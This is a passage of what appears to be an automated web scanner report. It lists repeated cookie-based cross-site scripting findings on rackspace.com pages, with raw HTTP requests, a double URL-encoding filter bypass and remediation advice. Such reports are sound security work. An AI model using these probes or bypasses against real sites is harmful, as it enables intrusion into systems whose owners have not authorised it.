gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39632%2527%253b51a258d1970 was submitted in the IS_UASrackuid cookie. This input was echoed as 39632';51a258d1970 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/backup_and_collaboration/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f839632%2527%253b51a258d1970; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64f6a%2527%253b050b0238238 was submitted in the IS_UASrackuid cookie. This input was echoed as 64f6a';050b0238238 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/backup_and_collaboration/data_backup_software/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f864f6a%2527%253b050b0238238; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 145e5%2527%253b723bb6ef75f was submitted in the IS_UASrackuid cookie. This input was echoed as 145e5';723bb6ef75f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/backup_and_collaboration/online_file_storage/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8145e5%2527%253b723bb6ef75f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5db2d%2527%253bd722a986d37 was submitted in the IS_UASrackuid cookie. This input was echoed as 5db2d';d722a986d37 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/blog HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f85db2d%2527%253bd722a986d37; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a4dc%2527%253b79d2c0ab149 was submitted in the IS_UASrackuid cookie. This input was echoed as 1a4dc';79d2c0ab149 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/blog/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f81a4dc%2527%253b79d2c0ab149; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3a89%2527%253ba33747be63c was submitted in the IS_UASrackuid cookie. This input was echoed as a3a89';a33747be63c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/blog/2010/06/increase_productivity_with_free_training/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a3a89%2527%253ba33747be63c; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f65b2%2527%253b8d6b737ba90 was submitted in the IS_UASrackuid cookie. This input was echoed as f65b2';8d6b737ba90 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/blog/2011/01/content_management_system_comparison_search_engine_optimization HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8f65b2%2527%253b8d6b737ba90; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9573%2527%253b5be92eab07b was submitted in the IS_UASrackuid cookie. This input was echoed as f9573';5be92eab07b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/blog/2011/01/in-house_or_hosted_email HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8f9573%2527%253b5be92eab07b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 435c4%2527%253b58176ca46d5 was submitted in the IS_UASrackuid cookie. This input was echoed as 435c4';58176ca46d5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/blog/2011/02/stay_connected_in_the_snow HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8435c4%2527%253b58176ca46d5; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c1ae%2527%253b92b61a2a14d was submitted in the IS_UASrackuid cookie. This input was echoed as 5c1ae';92b61a2a14d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/careers/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f85c1ae%2527%253b92b61a2a14d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1c38%2527%253b969c1228a5 was submitted in the IS_UASrackuid cookie. This input was echoed as e1c38';969c1228a5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
